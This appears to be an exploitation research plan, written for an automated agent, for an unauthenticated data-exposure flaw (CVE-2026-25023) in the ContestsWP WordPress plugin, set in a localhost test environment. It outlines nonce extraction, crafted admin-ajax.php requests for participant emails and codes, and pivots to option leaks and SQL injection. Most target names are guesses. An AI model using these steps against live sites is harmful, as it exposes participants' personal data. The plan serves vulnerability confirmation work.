Run Contests, Raffles, and Giveaways with ContestsWP <= 2.0.7 - Unauthenticated Information Exposure

Based on the vulnerability description for CVE-2026-25023, the plugin "Run Contests, Raffles, and Giveaways with ContestsWP" (slug: contest-code-checker) contains an unauthenticated information exposure vulnerability. This typically occurs when an AJAX handler or REST API endpoint intended for administrative use or restricted frontend use is registered for unauthenticated users (wp_ajax_nopriv_) and fails to implement proper capability or identity checks.

The following exploitation research plan is designed for an automated agent to identify and confirm the leak of sensitive participant or configuration data.

---

1. Vulnerability Summary

• Vulnerability: Unauthenticated Information Exposure.
• Plugin: Run Contests, Raffles, and Giveaways with ContestsWP (ContestsWP).
• Vulnerable Versions: <= 2.0.7.
• Root Cause: Improper access control on an AJAX action (likely registered via wp_ajax_nopriv_) that retrieves database records containing participant details (emails, names, entry codes) or plugin settings without validating the requester's authority.

2. Attack Vector Analysis

• Endpoint: http://localhost:8080/wp-admin/admin-ajax.php.
• Action (Inferred): Likely registered as wp_ajax_nopriv_cwp_get_entries, wp_ajax_nopriv_get_contest_data, or wp_ajax_nopriv_check_code_status. (Agent must verify the exact string in the source).
• Authentication: None required (Unauthenticated).
• Preconditions: At least one contest must exist with participant entries to demonstrate "Information Exposure."

3. Code Flow (Inferred Trace)

1. Entry Point: The plugin registers a hook: add_action('wp_ajax_nopriv_[ACTION_NAME]', 'handler_function').
2. Handler Execution: The handler_function is called when a POST request hits admin-ajax.php with the corresponding action.
3. Data Fetching: The handler likely uses $wpdb to select records from a custom table (e.g., {$wpdb->prefix}contests_entries) or get_posts with a custom post type.
4. Vulnerable Sink: The code performs echo json_encode($data) or wp_send_json($data) without checking current_user_can('manage_options') or verifying a nonce that is restricted to authorized sessions.
5. Output: Sensitive data (emails, PII) is returned in the HTTP response body.

4. Nonce Acquisition Strategy

If the plugin uses check_ajax_referer or wp_verify_nonce, the nonce is likely exposed to unauthenticated users on pages where the contest form or "check status" shortcode is rendered.

Step-by-step extraction:

1. Identify Shortcodes: Search for add_shortcode in the plugin directory. Common candidates: [contests_wp], [contest_code_checker], or [cw_giveaway].
2. Create Discovery Page: Use WP-CLI to create a page containing the found shortcode:

   wp post create --post_type=page --post_title="Contest Page" --post_status=publish --post_content='[SHORTCODE_NAME]'
   

3. Extract Nonce via Browser:
   • Navigate to the new page using browser_navigate.
   • Inspect wp_localize_script output. Use browser_eval to find the nonce.
   • Likely Variable: window.cwp_ajax?.nonce or window.contests_wp_vars?.nonce. (Agent must check the JS files in the assets folder for the localization key).

5. Test Data Setup

To confirm the vulnerability, the environment must contain sensitive data to expose.

1. Create a Contest: If possible via WP-CLI or by simulating the plugin's submission form.
2. Insert Dummy Entries: Insert records into the plugin's database table:

   # Example (Table name may vary, agent must check schema in activation hook)
   wp db query "INSERT INTO wp_contests_entries (name, email, entry_code) VALUES ('Target User', 'sensitive@example.com', 'SECRET123')"
   

6. Exploitation Strategy

The agent will perform the following steps:

1. Source Code Audit:
   • Search for wp_ajax_nopriv_ in the plugin folder.
   • Identify the handler function.
   • Check if the handler takes any parameters (e.g., contest_id, search, page).
2. Payload Construction:
   • Construct a POST request to admin-ajax.php.
   • URL: http://localhost:8080/wp-admin/admin-ajax.php
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body: action=[ACTION_NAME]&nonce=[NONCE_IF_REQUIRED]&contest_id=1
3. Execution: Use the http_request tool.
4. Data Extraction: Analyze the JSON response for sensitive keys like email, address, phone, or code.

7. Expected Results

• Success: An HTTP 200 response containing a JSON array or object with the dummy data created in Step 5.
• Example Response:

  [
    {"id": "1", "name": "Target User", "email": "sensitive@example.com", "entry_code": "SECRET123"}
  ]
  

8. Verification Steps

After receiving the response via http_request, confirm the data matches the database:

1. Compare the email address returned in the HTTP response to the one inserted via WP-CLI.
2. Verify that the same request made without a valid nonce (if required) or with a modified action fails, confirming the specific entry point.

9. Alternative Approaches

• REST API Discovery: Check if the plugin registers routes using register_rest_route. If permission_callback is set to __return_true or is missing, try:
  • GET /wp-json/contests-wp/v1/entries
• Direct Option Leak: If the AJAX action allows a setting_name parameter, try to request wp_options keys like admin_email or plugin-specific API keys.
• Information Exposure via SQLi: If the AJAX action accepts an id or search parameter, check if it's used in a raw $wpdb->get_results call, which could lead to a deeper information leak via SQL injection.